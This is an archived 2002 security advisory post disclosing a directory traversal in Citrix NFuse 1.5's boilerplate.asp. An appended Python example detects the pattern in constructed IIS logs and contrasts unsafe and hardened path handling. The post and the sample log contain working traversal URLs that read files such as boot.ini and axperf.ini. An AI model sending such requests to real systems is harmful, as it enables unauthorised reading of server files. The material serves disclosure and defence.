Citrix Nfuse directory traversal with boilerplate.asp

From: Eric Budke (budkeat_private)
Date: Wed Mar 27 2002 - 13:26:36 PST


    This vulnerability is based on being an authenticated user (as opposed to a 
    prior bug someone put out for unauthenticated users).
    
    Disclaimer:
    My ability to find a resource at Citrix via their web site was not 
    successful, thus the post here. They have been notified thanks to some 
    contacts forwarded from people on Bugtraq.
    Given that you must be authenticated first, one assumes that you have some 
    minimal level of trust for the end user, so the severity isn't that high.
    I don't have access to large numbers of systems on which to check this and 
    to check across multiple versions. This should be reproducible, no guarantees.
    
    Solution: According to Citrix this issue is only in Nfuse 1.5 as the 
    boilerplate.asp goes away in the most recent version. Assuming one 
    upgrades, this and a number of other non-public (from what I can gather 
    from Citrix) vulnerabilities go away. I don't have the facilities to test 
    on the latest version, and for all I know something similar can be done 
    there. Citrix has been notified, their solution was to upgrade.
    A command such as:
    http://10.x.x.x/boilerplate.asp?NFuse_Template=template.ica&NFuse_Application=Attorneyx0020Homex0020Directory&NFuse_MIMEExtension=.ica 
    
    Can be replaced with one like this:
    http://10.x.x.x/boilerplate.asp?NFuse_Template=../../winnt/system32/axperf.ini&NFuse_CurrentFolder=/ 
    
    It seems to work with things in winnt and winnt/system32; it doesn't seem 
    to like things back on the c:\, which gives up its very minor vuln of the 
    path of wwwroot.
    http://10.x.x.x/boilerplate.asp?NFuse_Template=../../boot.ini&NFuse_CurrentFolder=/SSLx0020Directories
    
    Gives up:
    There was an error:The Citrix HTML template specified does not exist or 
    could not be accessed. The template file specified was: 
    c:\inetpub\wwwroot\../../boot.ini
    Nice but lacking much use. So it seems we have another directory traversal 
    issue.
    
    
    Credits: Professionally I work for Foundstone (www.foundstone.com). This 
    wouldn't have been found without a client engagement through them.
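
    Added example, not part of the original post and not Citrix's own code. It does
    two things a reader of the post is likely to want: flag the NFuse_Template
    traversal pattern in IIS W3C log lines, and show the bare string concatenation
    that yields the "c:\inetpub\wwwroot\../../boot.ini" error next to a resolver that
    refuses anything outside the template directory. Assumptions: the log field
    layout, the wwwroot path (taken from the error message in the post), the sample
    log lines (constructed, not real traffic), and the xHHHH escaping of spaces,
    which is inferred from the URLs in the post rather than from any Citrix
    documentation.

```python
"""Added example: detect NFuse_Template traversal in IIS logs and compare the
unsafe path join with a hardened one. Not code from the original post or from
Citrix; sample data below is constructed."""
import ntpath
import re
from urllib.parse import parse_qs, unquote

# Constructed W3C extended log lines (assumed field order:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status).
SAMPLE_LOG = """\
2002-03-27 13:26:36 10.0.0.5 GET /boilerplate.asp NFuse_Template=template.ica&NFuse_Application=Attorneyx0020Homex0020Directory&NFuse_MIMEExtension=.ica 200
2002-03-27 13:27:01 10.0.0.5 GET /boilerplate.asp NFuse_Template=../../winnt/system32/axperf.ini&NFuse_CurrentFolder=/ 200
2002-03-27 13:27:15 10.0.0.5 GET /boilerplate.asp NFuse_Template=../../boot.ini&NFuse_CurrentFolder=/SSLx0020Directories 200
2002-03-27 13:27:40 10.0.0.9 GET /boilerplate.asp NFuse_Template=..%2F..%2Fwinnt%2Fwin.ini&NFuse_CurrentFolder=/ 200
2002-03-27 13:28:02 10.0.0.9 GET /login.asp - 200
"""

# A ".." path component, with either separator, at start, middle or end.
TRAVERSAL_RE = re.compile(r"(^|[\\/])\.\.([\\/]|$)")

# Path revealed by the error message quoted in the post.
WWWROOT = r"c:\inetpub\wwwroot"


def nfuse_unescape(value):
    """Undo the xHHHH escaping seen in the post's URLs (x0020 -> space).
    Assumption: this is how NFuse 1.5 encodes non-URL-safe characters."""
    return re.sub(r"x([0-9A-Fa-f]{4})",
                  lambda m: chr(int(m.group(1), 16)), value)


def parse_line(line):
    """Split one constructed W3C line into a dict; None for blank/comment lines."""
    if not line.strip() or line.startswith("#"):
        return None
    date, time, ip, method, stem, query, status = line.split()
    return {"time": f"{date} {time}", "ip": ip, "method": method,
            "stem": stem, "query": "" if query == "-" else query,
            "status": int(status)}


def find_traversals(log_text):
    """Return (time, ip, decoded NFuse_Template) for every request whose
    NFuse_Template parameter contains a '..' path component."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not rec["query"]:
            continue
        params = parse_qs(rec["query"], keep_blank_values=True)
        for raw in params.get("NFuse_Template", []):
            # parse_qs already URL-decoded once; a second unquote catches
            # double-encoded forms such as %252e%252e%252f.
            tmpl = nfuse_unescape(unquote(raw))
            if TRAVERSAL_RE.search(tmpl):
                hits.append((rec["time"], rec["ip"], tmpl))
    return hits


def unsafe_template_path(template):
    """The behaviour the post's error message shows: plain concatenation,
    so '../../boot.ini' is passed through untouched."""
    return WWWROOT + "\\" + template


def safe_template_path(template):
    """Hardened variant: normalise with Windows path rules and require the
    result to stay under WWWROOT. Returns None for anything that escapes,
    including absolute paths and drive-relative ones."""
    root = ntpath.normpath(WWWROOT)
    full = ntpath.normpath(ntpath.join(root, template))
    if full.lower() != root.lower() and \
            not full.lower().startswith(root.lower() + "\\"):
        return None
    return full


if __name__ == "__main__":
    for when, ip, tmpl in find_traversals(SAMPLE_LOG):
        print(f"{when} {ip} NFuse_Template={tmpl!r}")
        print(f"   unsafe: {unsafe_template_path(tmpl)}")
        print(f"   safe:   {safe_template_path(tmpl)}")
```

    The detector keys only on the NFuse_Template parameter because that is the one
    the post shows being abused; NFuse_CurrentFolder is decoded the same way if you
    want to extend it. The hardened resolver uses ntpath so the check runs the same
    on a Linux log-analysis box as it would on the IIS host.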
    This archive was generated by hypermail 2b30 : Thu Mar 28 2002 - 07:23:06 PST